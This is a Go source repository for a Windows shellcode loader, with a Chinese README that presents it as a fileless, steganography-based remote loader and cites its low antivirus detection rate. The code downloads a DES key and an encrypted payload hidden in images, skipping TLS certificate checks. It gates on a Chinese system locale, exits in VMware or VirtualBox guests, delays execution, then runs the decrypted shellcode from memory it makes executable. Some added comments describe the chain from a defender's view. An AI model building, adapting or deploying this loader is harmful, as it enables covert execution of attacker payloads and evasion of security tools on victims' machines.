├── .idea ├── .name ├── .gitignore ├── misc.xml ├── modules.xml └── shellcode-web-load.iml ├── 123.png ├── 456.png ├── root ├── encode.go ├── decode.go ├── getimg.go └── checkvm.go ├── go.mod ├── main.go ├── go.sum ├── README.md └── exp └── root.go
/.idea/.name:
--------------------------------------------------------------------------------
shellcode-web-load
--------------------------------------------------------------------------------
/123.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TryGOTry/go-shellcode-webimg-load/HEAD/123.png
--------------------------------------------------------------------------------
/456.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TryGOTry/go-shellcode-webimg-load/HEAD/456.png
--------------------------------------------------------------------------------
/root/encode.go:
--------------------------------------------------------------------------------
package root

import "encoding/hex"

// Encode hex-decodes str and returns the decoded bytes as a string.
// Despite its name this is a decode step: Check (checkvm.go) passes it hex
// literals that decode to file-system paths, which keeps those paths out of
// plain-text string scans of the binary. The error from hex.DecodeString is
// discarded, so a malformed literal yields only the bytes decoded before the
// error (possibly the empty string).
func Encode(str string) string {
	s, _ := hex.DecodeString(str)
	return string(s)
}

--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
module shellcode

go 1.14

require (
	github.com/auyer/steganography v1.0.0
	golang.org/x/sys v0.0.0-20210309074719-68d13333faf2
)

--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
package main

import (
	"shellcode/exp"
)

// deskey and descode are empty in source; the README build line injects them
// with -ldflags "-X main.deskey=... -X main.descode=...". Linker-set values
// are ordinary string data in the compiled binary, so both URLs remain
// recoverable from a sample.
var deskey string
var descode string

// main hands the two injected URLs to exp.Exp, which does all the work.
func main() {
	exp.Exp(deskey, descode) // run
}

--------------------------------------------------------------------------------
/.idea/.gitignore:
-------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /dataSources/ 6 | /dataSources.local.xml 7 | # 基于编辑器的 HTTP 客户端请求 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/shellcode-web-load.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/auyer/steganography v1.0.0 h1:0jty6tzmLff01Oe1Nz197XcutYV+LhgUhySCbfNQUrI= 2 | github.com/auyer/steganography v1.0.0/go.mod h1:Q2qN+f1ixaXnKTCT4xkSDCZ/5NiOpUeTgOCLwQdJD+A= 3 | golang.org/x/sys v0.0.0-20210309074719-68d13333faf2 h1:46ULzRKLh1CwgRq2dC5SlBzEqqNCi8rreOZnNrbqcIY= 4 | golang.org/x/sys v0.0.0-20210309074719-68d13333faf2/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 图片隐写的远程shellcode加载器,无文件落地版本 2 | --- 3 | 采用des加密,所以需要des加密的shellcode网址,和des的key(将隐写的图片放入web服务器) 4 | --- 5 | vt查杀率:4/66 6 | ![avatar](https://github.com/TRYblog/shellcode-load-web/blob/main/123.png) 7 | 微步 8 | ![avatar](https://github.com/TRYblog/shellcode-load-web/blob/main/456.png) 9 | ### 如何编译 10 | ``` 11 | go build 
-ldflags "-w -H=windowsgui -X main.deskey=deskey的网址 -X main.descode=descode的网址"
```
### 关于shellcode加密
[相关项目](https://github.com/TRYblog/des.hex-encodefile)
直接加密64位的raw格式的payload即可
### 关于图片隐写
[在线生成](http://c2.57dir.com)
图片隐写项目:https://github.com/auyer/steganography
### 关于作者
一个菜鸟.
[个人博客](https://www.nctry.com)

2021.03.10
--------------------------------------------------------------------------------
/root/decode.go:
--------------------------------------------------------------------------------
package root

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	_ "image/jpeg" // registers the JPEG decoder used by image.Decode in Getimg (getimg.go)
)

// ZeroUnPadding removes 0x00 bytes from both ends of origData. bytes.TrimFunc
// trims leading as well as trailing bytes, and the result is a sub-slice of
// the input, not a copy.
func ZeroUnPadding(origData []byte) []byte {
	return bytes.TrimFunc(origData,
		func(r rune) bool {
			return r == rune(0)
		})
}

// Decrypt hex-decodes decrypted (the ciphertext), decrypts it block by block
// with single DES under key, strips NUL padding and returns the plaintext as a
// string. Each 8-byte block is decrypted independently with no IV (ECB mode)
// and nothing authenticates the ciphertext. Returns "" when the hex is
// malformed, when des.NewCipher rejects the key (it must be exactly 8 bytes),
// or when the ciphertext length is not a multiple of the block size.
func Decrypt(decrypted string, key []byte) string { // DES decrypt
	src, err := hex.DecodeString(decrypted)
	if err != nil {
		return ""
	}
	block, err := des.NewCipher(key)
	if err != nil {
		return ""
	}
	out := make([]byte, len(src))
	dst := out
	bs := block.BlockSize()
	if len(src)%bs != 0 {
		return ""
	}
	// Independent per-block decryption (ECB); dst advances through out in step with src.
	for len(src) > 0 {
		block.Decrypt(dst, src[:bs])
		src = src[bs:]
		dst = dst[bs:]
	}
	out = ZeroUnPadding(out)
	return string(out)
}

--------------------------------------------------------------------------------
/root/getimg.go:
--------------------------------------------------------------------------------
package root

import (
	"bufio"
	"crypto/tls"
	"fmt"
	"github.com/auyer/steganography"
	"image"
	_ "io/ioutil" // blank import with no registration side effect; effectively unused
	"net/http"
	"net/http/cookiejar"
)

// Getimg downloads the image at url and returns the message the
// auyer/steganography library extracts from it, as a string. Exp fetches both
// the DES key and the ciphertext this way, so each stage travels as an
// ordinary image download.
//
// Network behaviour relevant to detection: TLS certificate verification is
// disabled (InsecureSkipVerify), so self-signed or mismatched hosts are
// accepted; no User-Agent is set, so Go's default client string is sent; a
// fresh cookie jar is created per call.
//
// Error handling: a failed Get only prints a message and leaves resp nil, so
// the deferred resp.Body.Close() and the read below dereference nil. The
// error from image.Decode is ignored and the (possibly nil) image is handed
// straight to the steganography library. The only decoder this package
// registers itself is image/jpeg (decode.go); any other format would have to
// be registered by a dependency — confirm before relying on it.
func Getimg(url string) string { // decode img
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // no certificate validation
	}
	// HTTP cookie jar
	cookieJar, _ := cookiejar.New(nil)
	c := &http.Client{
		Jar:       cookieJar,
		Transport: tr,
	}
	resp, err := c.Get(url)
	if err != nil {
		fmt.Println("获取失败.")
	}
	defer resp.Body.Close() // resp is nil when err != nil
	reader := bufio.NewReader(resp.Body)
	img, _, err := image.Decode(reader)
	sizeOfMessage := steganography.GetMessageSizeFromImage(img) // Uses the library to check the message size
	msg := steganography.Decode(sizeOfMessage, img)
	decodestr := string(msg)
	return decodestr
}

--------------------------------------------------------------------------------
/root/checkvm.go:
--------------------------------------------------------------------------------
package root

// VM detection: exit if any well-known VMware/VirtualBox guest artifact exists.
import "os"

// Fack exits the process with status 1 when path exists. The error from
// PathExists is ignored, so a path that cannot be stat'ed for any reason other
// than not-exist is treated as absent.
func Fack(path string) { // does a VM marker file exist?
	b, _ := PathExists(path)
	if b {
		os.Exit(1) // exit the process
	}
}

// PathExists reports whether path can be stat'ed. It returns (false, nil) for
// a not-exist error and (false, err) for any other stat failure.
func PathExists(path string) (bool, error) { // does the file exist?
	_, err := os.Stat(path)
	if err == nil {
		return true, nil
	}
	if os.IsNotExist(err) {
		return false, nil
	}
	return false, err
}

// Check runs Fack over a fixed list of hex-encoded Windows paths (decoded by
// Encode). They are VMware and VirtualBox guest artifacts under
// C:\windows\System32: the Drivers\ entries Vmmouse.sys, vmtray.dll,
// VMToolsHook.dll, vmmousever.dll, vmhgfs.dll, vmGuestLib.dll, VBoxMouse.sys,
// VBoxGuest.sys, VBoxSF.sys and VBoxVideo.sys, then vboxdisp.dll, vboxhook.dll,
// vboxoglerrorspu.dll, vboxoglpassthroughspu.dll, vboxservice.exe, vboxtray.exe
// and VBoxControl.exe. Exp calls Check only after both image downloads, so the
// network requests are observable even on a host that is then rejected here.
func Check() {
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C566D6D6F7573652E737973"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D747261792E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C564D546F6F6C73486F6F6B2E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D6D6F7573657665722E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D686766732E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D47756573744C69622E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F784D6F7573652E737973"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F7847756573742E737973"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F7853462E737973"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F78566964656F2E737973"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78646973702E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78686F6F6B2E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F786F676C6572726F727370752E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F786F676C706173737468726F7567687370752E646C6C"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78736572766963652E657865"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78747261792E657865"))
	Fack(Encode("433A5C77696E646F77735C53797374656D33325C56426F78436F6E74726F6C2E657865"))
}

--------------------------------------------------------------------------------
/exp/root.go:
--------------------------------------------------------------------------------
package exp

import (
	"encoding/hex"
	"fmt"
	"golang.org/x/sys/windows"
	"os"
	"shellcode/root"
	"syscall"
	"time"
	"unsafe"
)

const (
	// MEM_COMMIT is a Windows constant used with Windows API calls
	MEM_COMMIT = 0x1000
	// MEM_RESERVE is a Windows constant used with Windows API calls
	MEM_RESERVE = 0x2000
	// PAGE_EXECUTE_READ is a Windows constant used with Windows API calls
	PAGE_EXECUTE_READ = 0x20
	// PAGE_READWRITE is a Windows constant used with Windows API calls
	PAGE_READWRITE = 0x04
)

// Exp is the loader entry point called from main with the two linker-injected
// URLs. Sequence:
//  1. Exit unless the first user-preferred UI language is "zh-CN" (a locale
//     gate; a[0] is indexed without a length check).
//  2. Fetch the DES key image from deskey and the ciphertext image from
//     descode via root.Getimg — both network requests happen before any VM check.
//  3. root.Check: exit if VMware/VirtualBox guest artifacts are present.
//  4. Sleep 10 s, then DES-decrypt (root.Decrypt) and hex-decode the payload.
//  5. VirtualAlloc a private RW region, RtlCopyMemory the bytes into it,
//     VirtualProtect it to RX, and transfer control with syscall.Syscall(addr, ...).
//
// Every error branch is empty, so the sequence continues regardless of
// failures; an empty payload (Decrypt returning "") panics at &shellcode[0].
// LazyProc.Call returns a non-nil Errno even on success, which is why success
// is recognised by string-comparing the error message.
//
// From a defender's view the observable chain is: two HTTPS image downloads
// with certificate verification disabled, a fixed 10-second delay, a private
// allocation whose protection changes from RW to RX, and execution from that
// region.
func Exp(deskey string, descode string) {
	a, err := windows.GetUserPreferredUILanguages(windows.MUI_LANGUAGE_NAME)
	if err == nil {
		if a[0] != "zh-CN" { // locale gate; panics if the list is empty
			fmt.Printf("当前不是中文系统")
			os.Exit(1)
		} else {
			key := []byte(root.Getimg(deskey))
			code := root.Getimg(descode)
			root.Check()                                // VM check runs only after both downloads
			time.Sleep(time.Duration(10) * time.Second) // fixed delay before decryption (likely an analysis delay)
			shellcode, errShellcode := hex.DecodeString(root.Decrypt(code, key))
			if errShellcode != nil {
			}
			//fmt.Println("key:", key, "\ncode:", code)
			kernel32 := windows.NewLazySystemDLL("kernel32.dll")
			ntdll := windows.NewLazySystemDLL("ntdll.dll")
			VirtualAlloc := kernel32.NewProc("VirtualAlloc")
			VirtualProtect := kernel32.NewProc("VirtualProtect")
			RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
			// Private RW allocation sized to the payload.
			addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
			if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." {
			}
			// &shellcode[0] panics when the payload is empty.
			_, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
			if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." {
			}
			// Untyped constant defaults to int; receives VirtualProtect's 32-bit old
			// protection value in a wider local on 64-bit Windows.
			oldProtect := PAGE_READWRITE
			// RW -> RX transition on the region just written.
			_, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))

			if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." {

			}
			// Control transfer into the RX region; the return value is never acted on.
			_, _, errSyscall := syscall.Syscall(addr, 0, 0, 0, 0)
			if errSyscall != 0 {
			}

		}
	}
}

--------------------------------------------------------------------------------